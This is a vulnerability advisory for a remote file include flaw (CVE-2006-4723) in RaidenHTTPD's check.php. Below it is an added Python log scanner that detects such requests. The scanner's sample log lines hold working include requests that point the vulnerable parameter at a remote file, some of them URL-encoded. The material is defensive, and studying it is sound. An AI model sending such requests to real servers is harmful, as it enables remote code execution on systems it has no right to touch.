VID |
21975 |
Severity |
40 |
Port |
80, ... |
Protocol |
TCP |
Class |
CGI |
Detailed Description |
The RaidenHTTPD HTTP server is affected by multiple remote file include vulnerabilities via the check.php script. RaidenHTTPD is a full-featured web server for Microsoft Windows operating systems. RaidenHTTPD version 1.1.49 and earlier versions could allow a remote attacker to include malicious PHP files, caused by improper validation of user-supplied input passed to the 'SoftParserFileXml' parameter of the '/raidenhttpd-admin/slice/check.php' script. If PHP's 'register_globals' and 'WebAdmin' settings are enabled, a remote attacker can send a specially-crafted URL request to execute arbitrary PHP code and operating system commands on the affected host.
* References: http://www.frsirt.com/english/advisories/2006/3542 http://milw0rm.com/exploits/2328 http://secunia.com/advisories/21833
* Platforms Affected: RaidenHTTPD Team: RaidenHTTPD version 1.1.49 and earlier versions; Microsoft Windows: Any version |
Recommendation |
No upgrade or patch available as of Sep 2006.
Upgrade to a version of RaidenHTTPD greater than 1.1.49 when a new fixed version becomes available from the RaidenHTTPD Web site at http://www.raidenhttpd.com/en/index.html
As a workaround, disable PHP's 'register_globals' setting. |
Related URL |
CVE-2006-4723 (CVE) |
Related URL |
19918 (SecurityFocus) |
Related URL |
28821 (ISS) |
|
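To check existing access logs for the request pattern in the Detailed Description, the following added example (not part of the original advisory or of RaidenHTTPD) flags requests to check.php whose 'SoftParserFileXml' value points at a remote location. The common/combined log format, the function names and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script path and parameter named in the advisory above.
VULN_PATH = "/raidenhttpd-admin/slice/check.php"
VULN_PARAM = "softparserfilexml"

# Assumption: the server writes common/combined-format access log lines.
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Value that points off the local file system: URL-style scheme or UNC path.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|\\\\|//)', re.I)

def _decode(value, rounds=2):
    """Undo up to `rounds` further layers of URL encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_rfi_attempts(lines):
    """Return (client, status, value) for requests that pass a remote
    location in SoftParserFileXml to check.php."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        # Windows paths are case-insensitive, so compare in lower case.
        if _decode(url.path).lower() != VULN_PATH:
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = _decode(value)
            if name.lower() == VULN_PARAM and REMOTE_RE.match(value):
                hits.append((m.group("client"), int(m.group("status")), value))
    return hits

# Constructed sample log lines (documentation addresses and hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Sep/2006:10:15:02 +0000] "GET /raidenhttpd-admin/slice/check.php?SoftParserFileXml=http://files.example.test/inc.txt HTTP/1.1" 200 512',
    '203.0.113.9 - - [12/Sep/2006:10:16:40 +0000] "GET /RaidenHTTPD-Admin/slice/check.php?softparserfilexml=http%3A%2F%2Ffiles.example.test%2Finc.txt HTTP/1.0" 404 0',
    '203.0.113.9 - - [12/Sep/2006:10:17:05 +0000] "GET /raidenhttpd-admin/slice/check.php?SoftParserFileXml=http%253A%252F%252Ffiles.example.test%252Finc.txt HTTP/1.1" 200 512',
    '192.0.2.10 - - [12/Sep/2006:10:18:11 +0000] "GET /raidenhttpd-admin/slice/check.php?SoftParserFileXml=settings.xml HTTP/1.1" 200 90',
    '192.0.2.10 - - [12/Sep/2006:10:19:30 +0000] "GET /index.php?next=http://www.example.test/ HTTP/1.1" 200 1200',
]
```

Access logs record only the request line, so this check sees query-string values and nothing sent in a request body.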